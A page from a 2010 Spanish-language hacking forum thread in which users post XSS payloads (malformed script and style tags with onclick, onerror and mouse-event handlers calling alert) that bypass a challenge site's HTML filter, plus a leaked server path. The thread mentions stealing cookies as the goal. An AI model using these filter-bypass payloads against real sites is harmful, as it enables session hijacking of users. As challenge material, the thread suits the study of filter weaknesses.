[CYH] Bypass de filtros de XSS :) página 2

Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

Foro

Web

Blog

2 Mayo 2024, 15:23 pm

Tema destacado: Guía rápida para descarga de herramientas gratuitas de seguridad y desinfección

Foro de elhacker.net

Seguridad Informática

Hacking

Bugs y Exploits

Nivel Web (Moderadores: sirdarckcat, WHK)

[CYH] Bypass de filtros de XSS :)

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: 1 [2] 3

Autor

Tema: [CYH] Bypass de filtros de XSS :) (Leído 15,235 veces)

SeC

Desconectado

Mensajes: 109

@susan.

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #10 en: 15 Abril 2010, 00:08 am »

Parece que aún vale, asique

Código:

<STYLE TYPE="text/javascript">><a href="http://elhacker.net" onclick="alert(1)">XSS</a><</STYLE>

otro,

Código:

<script>><a href="http://elhacker.net" onclick="alert(1)">XSS</a><


« Última modificación: 15 Abril 2010, 14:06 pm por SeC »	En línea

Educad a los niños y no sera necesario castigar a los hombres - Pitagoras.

~ Yoya ~

Wiki

Desconectado

Mensajes: 1.125

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #11 en: 15 Abril 2010, 01:56 am »

Código:

<Script>><p onMouseDown=alert(0) >aa </p> t=
<script language="javascript">><p onMouseDown=alert(0) >aa </p> t=
<Style>><p onMouseOut=alert(0) >aa </p> t=


« Última modificación: 16 Abril 2010, 00:05 am por ~ Yoya ~ »	En línea

Mi madre me dijo que estoy destinado a ser pobre toda la vida.
Engineering is the art of balancing the benefits and drawbacks of any approach.

WHK

Moderador Global

Desconectado

Mensajes: 6.589

Sin conocimiento no hay espíritu

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #12 en: 15 Abril 2010, 06:03 am »

jajaja que chafa el filtro


	En línea

- https://yhojann.cl/ - https://whk.cl/

jdc

Desconectado

Mensajes: 3.406

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #13 en: 15 Abril 2010, 06:20 am »

File disclosoure no vale?

Citar

Warning: file_get_contents(/home/simoneme/allowhtml/main/files/antisamy.xml) [function.file-get-contents]: failed to open stream: No such file or directory in /home/simoneme/allowhtml/main/include/controllers/source_antisamy.php on line 7


	En línea

Castg!

Wiki

Desconectado

Mensajes: 1.191

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #14 en: 15 Abril 2010, 15:02 pm »

Phat disculosure


	En línea

Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma

netscape

Desconectado

Mensajes: 32

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #15 en: 15 Abril 2010, 22:55 pm »

Aquí estan los mios:

Código:

<script>>"/><a><<img src=lol.gif onerror=alert(1)> >

Código:

<script>>"/><a><<img src=lol.gif onerror=window.alert(1)> >

Código:

'>><marquee><h1>XSS</h1></marquee>

Código:

<script><TD><p onmousemove=alert('XSS') >lol </p><TABLE>

Código:

<script>><p lang="es"</p> onmouseup=alert('XSS')>>

Código:

<script>><q lang="he" dir="rtl"><p onmousedown=alert('XSS')</q></p>>

Saludos!!


« Última modificación: 16 Abril 2010, 23:33 pm por netscape »	En línea

cgvwzq

Desconectado

Mensajes: 57

Agente P.

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #16 en: 15 Abril 2010, 23:11 pm »

Pero si son todos el mismo...xD

Además, el último de netscape no es ni siquiera un bypass. ¬¬

A lo mucho se puede considerar el de SeC, que usa "style" en lugar de "script". Y da igual poner atributos, no afectan.


	En línea

Some stuff:

www.a] parsed as ]www.a]
Bypass elhacker's img filter with ALT attribute!
¿Para cuándo SQLi I y II? WZ

Twitter | Blog

Castg!

Wiki

Desconectado

Mensajes: 1.191

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #17 en: 16 Abril 2010, 00:16 am »

El último de netscape qué tiene de inyección de javascript?


	En línea

Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma

jdc

Desconectado

Mensajes: 3.406

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #18 en: 16 Abril 2010, 00:31 am »

Castg no necesitas inyectar javascript para que sea xss


	En línea

Castg!

Wiki

Desconectado

Mensajes: 1.191

Re: [CYH] Bypass de filtros de XSS :)

« Respuesta #19 en: 16 Abril 2010, 02:56 am »

¬¬ pero este desafio es asi

jajja, sino, xss en si es inyeccion HTML, y yapodemos inyectar html. lol.

la idea, es poder inyectar el codigo javascript para quitar una cookie.


	En línea

Creiste que mi firma había muerto? NO! Volvió, y en forma de fichas!

link al último código de la firma

Páginas: 1 [2] 3

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	bypass Juegos y Consolas	gordy(D!@bL0)	2	2,709	28 Abril 2006, 20:19 pm por gordy(D!@bL0)
	Bypass + iSQL Nivel Web	Shell Root	5	4,086	1 Junio 2011, 21:01 pm por .mokk.
	Bypass getimagesize() Pregunta. Nivel Web	dRak0	0	3,535	27 Noviembre 2013, 02:43 am por dRak0
	Esto es un ByPass? Dudas Generales	boy-ka	2	2,138	30 Julio 2015, 19:50 pm por boy-ka
	Bypass Hacking	Izaya	6	4,843	23 Marzo 2016, 21:28 pm por MCKSys Argentina